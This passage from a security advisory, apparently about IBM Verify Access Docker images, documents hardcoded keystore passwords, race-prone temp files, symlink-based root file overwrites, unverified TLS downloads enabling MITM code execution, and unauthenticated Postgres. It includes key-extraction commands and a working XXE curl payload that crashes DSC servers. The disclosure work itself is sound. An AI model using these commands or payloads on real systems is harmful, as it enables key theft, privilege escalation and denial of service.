5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:\n            d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:\n            51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:\n            de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:\n            92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:\n            c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:\n            0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:\n            9e:b8\n\nThe other files have been decrypted using `IBM Crypto For C` and OpenSSL. \n\nThe `lmi_trust_store.p12` file in the verify-access image contains several CAs and will also include the hardcoded key for the `Isam CA` in a live instance (after configuration):\n\n    kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12\n    kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword\n    \n    kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword\n    MAC: sha1, Iteration 1024\n    MAC length: 20, salt length: 8\n    PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n    Certificate bag\n    Bag Attributes\n        friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US\n        localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE \n        2.16.840.1.113894.746875.1.1: \u003cUnsupported tag 6\u003e\n    subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n    issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n    -----BEGIN CERTIFICATE-----\n    MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh\n    MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3\n    d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD\n    QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT\n    MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j\n    b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG\n    9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB\n    CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97\n    nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt\n    43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P\n    T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4\n    gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO\n    BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR\n    TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw\n    DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr\n    hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg\n    06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF\n    PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls\n    YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk\n    CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=\n    -----END CERTIFICATE-----\n    Certificate bag\n    Bag Attributes\n        friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n    [...]\n\nWhen auditing live installations, the decrypted `lmi_trust_store.p12` file will contain the private key of the isam CA. \n\n    kali% openssl x509 -in crt.pem -text -noout -modulus\n    Certificate:\n        Data:\n            Version: 3 (0x2)\n            Serial Number: 14004578023842938\n            Signature Algorithm: sha256WithRSAEncryption\n            Issuer: C = us, O = ibm, CN = isam\n            Validity\n                Not Before: Sep 19 07:01:51 2022 GMT\n                Not After : Sep 17 07:01:51 2032 GMT\n            Subject: C = us, O = ibm, CN = isam\n    [...]\n    Modulus=C8B3[REDACTED]\n    \n    kali% openssl rsa -in crt.key -modulus               \n    Enter pass phrase for crt.key:\n    Modulus=C8B3[REDACTED]\n    writing RSA key\n    -----BEGIN PRIVATE KEY-----\n    [REDACTED]\n    -----END PRIVATE KEY-----\n\nIt is also possible to decrypt the `embedded_ldap_keys.p12` file:\n\n    kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword \n    MAC: sha1, Iteration 1024       \n    MAC length: 20, salt length: 8\n    PKCS7 Data\n    Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5\n    Bag Attributes\n        friendlyName: server\n        localKeyID: [REDACTED]\n    Key Attributes: \u003cNo Attributes\u003e\n    Enter PEM pass phrase: [password]\n    Verifying - Enter PEM pass phrase: [password]\n    -----BEGIN ENCRYPTED PRIVATE KEY-----\n    [REDACTED]\n    -----END ENCRYPTED PRIVATE KEY-----\n    PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n    Certificate bag\n    Bag Attributes\n        friendlyName: server\n        localKeyID: [REDACTED]\n    subject=C = us, O = ibm, CN = isam\n    issuer=C = us, O = ibm, CN = isam\n    -----BEGIN CERTIFICATE-----\n    [REDACTED]\n    -----END CERTIFICATE-----\n    kali-docker#\n\nUsing a dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using `IBM Crypto For C` and OpenSSL. \n\n    kali-docker# pwd                                            \n    /home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab\n    kali-docker# ls -la\n    total 492\n    drwxr-x---  2 root root   4096 Oct 18 05:13 . \n    drwxr-x--- 16 root root   4096 Sep 20 03:01 .. \n    -rw-r-----  1 root root   2952 Sep 20 03:01 embedded_ldap_keys.p12\n    -rw-r-----  1 root root    193 Jun  8 01:31 embedded_ldap_keys.sth\n    -rw-r-----  1 root root  47630 Sep 20 03:09 lmi_trust_store.p12\n    -rw-r-----  1 root root    193 Jun  8 01:31 lmi_trust_store.sth\n    -rw-r-----  1 root root 109313 Sep 20 03:17 rt_profile_keys.p12\n    -rw-r-----  1 root root    193 Jun  8 01:31 rt_profile_keys.sth\n    [...]\n\n\n\n## Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information. \n\nThe `/usr/sbin/bootstrap.sh` script will generate temporary files using the default umask (`022`). \n\nIn the `build_health_check_config()` function found inside the `/usr/sbin/bootstrap.sh` script (executed when the instance starts), we can see that several files are generated:\n\n- - /tmp/health_check.p12\n- - /var/dsc/.health/port.txt\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n[code:shell]\n 65 #############################################################################\n 66 # Construct the health check configuration information.  This will include\n 67 # the port and client certificate information. \n 68 \n 69 build_health_check_config()\n 70 {\n 71     if [ -z \"$INSTANCE\" ] ; then\n 72         INSTANCE=1\n 73     fi\n 74 \n 75     conf=/var/dsc/etc/dsc.conf.${INSTANCE}\n 76 \n 77     if [ ! -f ${conf} ] ; then\n 78         Echo 973 \"${INSTANCE}\"\n 79         exit 1\n 80     fi\n 81 \n 82     #\n 83     # Determine the port which is to be used. \n 84     #\n 85 \n 86     port=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n 87                 dsess-server ssl-listen-port`\n 88 \n 89     mkdir -p /var/dsc/.health\n 90 \n 91     echo $port \u003e /var/dsc/.health/port.txt\n 92 \n 93     #\n 94     # Extract the client certificate which is used to communicate with the\n 95     # server. \n 96     #\n 97 \n 98     cert_file=/var/dsc/.health/health_check.pem\n 99 \n100     tmp_p12=/tmp/health_check.p12\n101     tmp_pwd=health_check\n102 \n103     # Work out the name of the key file which is being used. \n104     key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n105                 dsess-server ssl-keyfile`\n106 \n107     # Export the key into a key database type which is supported\n108     # by OpenSSL. \n109     gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n110             -target $tmp_p12 -target_pw $tmp_pwd\n111 \n112     # Convert the key into something that curl understands. \n113     openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n114             -passin pass:$tmp_pwd 2\u003e/dev/null\n115 \n116     # Tidy up. \n117     rm -f $tmp_p12\n118 }\n119\n[...]\n176 #\n177 # Extract the health check information. \n178 #\n179 \n180 build_health_check_config\n[/code]\n\nThe temporary file `/tmp/health_check.p12` contains the private keys of the dsc server and the dsc client. This key file is stored using the `644` permissions allowing any local attacker to extract these keys when the Docker image starts. \n\nFurthermore, the password of the certificate file is hardcoded (to `health_check`, on line 101). \n\nWhen checking the files generated by this script, we can confirm the files are world-readable. For example, for the `/var/dsc/.health/port.txt` file, the permissions are 644:\n\n    [isam@verify-access-dsc /]$ ls -la /var/dsc/.health/\n    total 28\n    drwxr-xr-x 2 isam isam 4096 Oct  4 09:07 . \n    drwxrwx--- 1 isam root 4096 Oct  4 09:07 ..     \n    -rw------- 1 isam isam 9268 Oct  4 09:07 health_check.pem\n    -rw-r--r-- 1 isam isam    5 Oct  4 09:07 port.txt\n    [isam@verify-access-dsc /]$\n\n\nThere is a race condition in the `/usr/sbin/bootstrap.sh` script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts. \n\nThe filename is predictable, allowing a local attacker to create the destination file before the script is executed. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access runs regularly the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store sensitive information. Since this script uses the default umask (`022`), an attacker can exploit a race condition (between the lines 91 and 95) to extract the private keys of the dsc server and the dsc clients. \n\nThe `/tmp/health_check.pem` output file will also be created containing the private keys in clear-text (in line 91), allowing an attacker to extract these private keys:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n[...]\n65 cert_file=/tmp/health_check.pem\n66 \n67 trap \"rm -f $result_file $error_file $hdr_file\" EXIT\n68 \n69 # The following function will extract a key which can be used to authenticate\n70 # to the DSC. \n71 \n72 extract_dsc_key()\n73 {\n74     if [ ! -f $cert_file ] ; then\n75         tmp_p12=/tmp/health_check.p12.$$\n76         tmp_pwd=health_check\n77 \n78         # Work out the name of the DSC configuration file. \n79         conf_file=`mesa_config wga.ftype dir dsc.conf -production`\n80 \n81         # Work out the name of the key file which is being used. \n82         key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \\\n83                 dsess-server ssl-keyfile`\n84 \n85         # Export the key into a key database type which is supported\n86         # by OpenSSL. \n87         gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n88             -target $tmp_p12 -target_pw $tmp_pwd\n89 \n90         # Convert the key into something that curl understands. \n91         openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n92             -passin pass:$tmp_pwd 2\u003e/dev/null\n93 \n94         # Tidy up. \n95         rm -f $tmp_p12\n96     fi\n97 }\n[...]\n[/code]\n\nThe file `/tmp/health_check.p12.$$` (`$$` corresponding to the local PID) will be generated with the password `health_check` and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client. \n\nThe filename is predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThere is also a leak of private keys in the world-readable file `/tmp/health_check.pem`. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n\nIt was observed that the Docker image verify-access regularly runs the script `/usr/sbin/health_check.sh`. \n\nThis script uses curl, without checking the remote SSL certificate:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n190 #\n191 # Make the curl request. \n192 #\n193 \n194 eval curl --insecure --output $result_file --silent --show-error \\\n195         -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n196\n[/code]\n\nThe eval instruction does not seem exploitable. \n\nThis script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside `/tmp`:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n 62 result_file=/tmp/health_check.out.$$\n 63 error_file=/tmp/health_check.err.$$\n[...]\n194 eval curl --insecure --output $result_file --silent --show-error \\\n195         -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n[/code]\n\n\nThe `/tmp/health_check.out.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe script trusts any insecure HTTPS server, due to the use of the `--insecure` flag in curl. \n\nThere are two uses of insecure files in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root. \n\nThe filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the `/usr/sbin/health_check.sh` script. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n\nIt was observed that the Docker image verify-access-sc runs regularly the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link. \n\nFurthermore, the script uses insecure options for curl on line 73 (`--insecure`) - the SSL certificate of the remote host will not be validated:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n62 #\n63 # Test access to the server as this will govern whether we are healthy or\n64 # not. \n65 #\n66 \n67 error_file=/tmp/health_check.err.$$\n68 \n69 trap \"rm -f $error_file\" EXIT\n70 \n71 ping_body=\u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/X    MLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n72 \n73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \\\n74         -H \u0027SOAPAction: \"ping\"\u0027 \\\n75         --data \"$ping_body\" \\\n76         https://127.0.0.1:$port 2\u003e $error_file\n77 \n78 if [ $? -ne 0 ] ; then\n79     #\n80     # We don\u0027t know for sure yet whether the DSC is alive or not because it\n81     # could be passive (only a single DSC is active in an environment at any\n82     # one time).  So, we also need to try a simple SSL connection before we\n83     # return that the server is actually unhealthy.  We could have simply\n84     # avoided the initial curl call, but by only performing the SSL connection\n85     # test when the DSC is passive we avoid SSL error messages being displayed\n86     # on the console. \n87     #\n88 \n89     openssl s_client -connect 127.0.0.1:$port 2\u003e\u00261 | grep -q CONNECTED\n90 \n91     if [ $? -eq 0 ] ; then\n92         exit 0\n93     fi\n94 \n95     echo \"Error\u003e failed to connect to the service.\"\n96 \n97     cat $error_file; rm -f $cert_file\n[/code]\n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root. \n\nThe filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command. \n\n\n\n## Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system. \n\nThe `/usr/sbin/.bootstrap_common.sh` script is executed from the `/usr/sbin/bootstrap.sh` script when the instance starts:\n\nContent of `/usr/sbin/bootstrap.sh` in verify-access-dsc\n\n[code:shell]\n139 #\n140 # Wait for the snapshot file. \n141 #\n142 \n143 wait_for_snapshot\n[/code]\n\nIn verify-access-runtime, the function `wait_for_snapshot()` is called on line 93 inside the `/usr/sbin/bootstrap.sh` script. \n\nThe function `wait_for_snapshot()` calls the function `download_from_cfgsvc()` (line 251):\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n240 #############################################################################\n241 # Wait for the snapshot file. \n242 \n243 wait_for_snapshot()\n244 {\n245     download_from_cfgsvc 1\n246 \n247     if [ ! -f $snapshot ] ; then\n248         Echo 969\n249 \n250         while [ ! -f $snapshot ] ; do\n251             download_from_cfgsvc 0\n252 \n253             if [ ! -f $snapshot ] ; then\n254                 sleep 1\n255             fi\n256         done\n257 \n258         Echo 970\n259     fi\n260 }\n[/code]\n\nAnd the function `download_from_cfgsvc()` uses curl to download a snapshot, without checking the SSL certificate of the remote server. The `-k` option (also known as `--insecure`) disables any SSL verification (line 154):\n\nContent `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n140 download_from_cfgsvc()\n141 {\n142     # No need to download the snapshot if the configuration service has not\n143     # been defined. \n144     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n145         return\n146     fi\n147 \n148     if [ $1 -eq 1 ] ; then\n149         Echo 960\n150     fi\n151 \n152     snapshotUri=\"`basename $snapshot`?type=File\u0026client=`cat /etc/hostname`\"\n153 \n154     curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n155         \"$CONFIG_SERVICE_URL/snapshots/$snapshotUri\" \\\n156             -o $snapshot\n157 \n158     if [ $? -ne 0 ] ; then\n159         if [ $1 -eq 1 ] ; then\n160             Echo 961\n161         fi\n162 \n163         rm -f $snapshot\n164     else\n165         Echo 962\n166     fi\n167 }\n[/code]\n\n- From the curl(1) man page:\n\n           -k, --insecure\n                  (TLS) By default, every SSL connection curl makes is verified to\n                  be secure. This option allows curl to proceed and operate even\n                  for server connections otherwise considered insecure. \n    \n                  The server connection is verified by making sure the server\u0027s\n                  certificate contains the right name and verifies successfully\n                  using the cert store. \n    \n                  See this online resource for further details:\n                   https://curl.haxx.se/docs/sslcerts.html\n    \n                  See also --proxy-insecure and --cacert. \n\nThe same issue exists with the function `download_fixpacks()` in the same shell script (line 201):\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n169 #############################################################################\n170 # Attempt to download any requested fixpacks from the configuration service. \n171 \n172 download_fixpacks()\n173 {\n174     # No need to download the fixpacks if the configuration service has not\n175     # been defined. \n176     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n177         return\n178     fi\n179 \n180     # No need to download the fixpacks if no fixpack has been specified, or\n181     # if the fixpack has been set to \u0027disabled\u0027. \n182     if [ -z \"${FIXPACKS}\" -o \"${FIXPACKS}\" = \"disabled\" ]; then\n183         return\n184     fi\n185 \n186     # Set the fixpack directory, and then ensure that the fixpack directory\n187     # has been created. \n188     fixpack_dir=/tmp/fixpacks\n189 \n190     if [ -d $fixpack_dir ] ; then\n191         rm -rf $fixpack_dir/*\n192     else\n193         mkdir -p $fixpack_dir\n194     fi\n195 \n196     # If we get this far we know that one or more fixpacks have been specified. \n197     # We need to download each of these now. \n198     for fixpack in $FIXPACKS; do\n199         fixpackUri=\"$fixpack?type=File\u0026client=`cat /etc/hostname`\"\n200 \n201         curl -k -s --fail \\\n202             -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n203             \"$CONFIG_SERVICE_URL/fixpacks/$fixpackUri\" \\\n204             -o $fixpack_dir/$fixpack\n[/code]\n\nThe fixpacks will be then installed as root inside the image:\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n231     for fixpack in $FIXPACKS; do\n232         Echo 967 \"${fixpack}\"\n233         /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} \u003e/dev/null\n234         if [ $? -ne 0 ]; then\n235             Echo 968 \"${fixpack}\"\n236         fi\n[/code]\n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\n\n\n## Details - Lack of authentication in Postgres inside verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime configures Postgres without authentication. \n\nThe `/usr/sbin/bootstrap.sh` script configures and starts the postgres daemon. We can see the lack of authentication:\n\n[code:shell]\n135 #\n136 # Start the postgresql server. \n137 #\n138 \n139 Echo 974\n140 \n141 db_root=/var/postgresql/config\n142 db_data_root=$db_root/data\n143 db_snapshot=$db_root/snapshot.sql\n144 db_log_dir=/var/application.logs/db/config\n145 db_port=5432\n146 db_name=config\n147 db_user=www-data\n148 \n149 if [ ! -f $db_snapshot ] ; then\n150     Echo 975\n151     exit 1\n152 fi\n153 \n154 mkdir -p $db_log_dir\n155 \n156 rm -rf $db_data_root\n157 \n158 initdb -D $db_data_root --locale=C -U $db_user -A trust \u003e /dev/null\n159 \n160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start\n161 \n162 createdb -U $db_user -p $db_port -w $db_name \u003e /dev/null\n163 \n164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name \u003e /dev/null\n165\n[/code]\n\nA local attacker can compromise the postgres database. \n\n\n\n## Details - Null pointer dereference in dscd - Remote DoS against DSC instances\n\nIt was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure. \n\nThe DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp. \n\nUsing an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:\n\n    [user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443\n    * Rebuilt URL to: https://dsc-02.test.lan:8443/\n    *   Trying 10.0.0.16... \n    * TCP_NODELAY set\n    * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)\n    * ALPN, offering h2\n    * ALPN, offering http/1.1\n    * successfully set certificate verify locations:\n    *   CAfile: /etc/pki/tls/certs/ca-bundle.crt\n      CApath: none\n    * TLSv1.3 (OUT), TLS handshake, Client hello (1):\n    * TLSv1.3 (IN), TLS handshake, Server hello (2):\n    * TLSv1.2 (IN), TLS handshake, Certificate (11):\n    * TLSv1.2 (IN), TLS handshake, Request CERT (13):\n    * TLSv1.2 (IN), TLS handshake, Server finished (14):\n    * TLSv1.2 (OUT), TLS handshake, Certificate (11):\n    * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n    * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n    * TLSv1.2 (OUT), TLS handshake, Finished (20):\n    * TLSv1.2 (IN), TLS alert, handshake failure (552):\n    * error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure\n    * Closing connection 0\n    curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure\n\nWith a client certificate, we can reach the `/DSess/services/DSess` API:\n\nSending a normal request (ping):\n\n    kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n    \u003c?xml version=\u00271.0\u0027 encoding=\u0027utf-8\u0027 ?\u003e\n    \u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\n    \u003cSOAP-ENV:Body\u003e\n    \u003cns1:pingResponse xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\n    \u003cns1:pingReturn\u003e952467756\u003c/ns1:pingReturn\u003e\n    \u003c/ns1:pingResponse\u003e\n    \u003c/SOAP-ENV:Body\u003e\n    \u003c/SOAP-ENV:Envelope\u003e\n\nWe can also send a specific XML External Entity (XXE) that will crash the remote DSC instance:\n\n    kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003c!DOCTYPE foo [ \u003c!ELEMENT foo ANY \u003e \u003c!ENTITY xxe SYSTEM \"file:///dev/random\"\u003e]\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n    curl: (52) Empty reply from server\n\n\nWhen debugging this issue, it appears there is a null pointer dereference in the method `DSessWrapper::ping(void*) ()` defined in `/lib64/libamdsc_interface.so` library:\n\n    [root@container-02]# ps -auxww | grep dscd\n    6000     2093037  3.4  0.5 427936 40884 ?        Ssl  20:07   0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j\n    root     2093269  0.0  0.0  12140  1092 pts/0    S+   20:07   0:00 grep --color=auto dscd\n    [root@container-02]# gdb -p 2093037\n    [...]\n    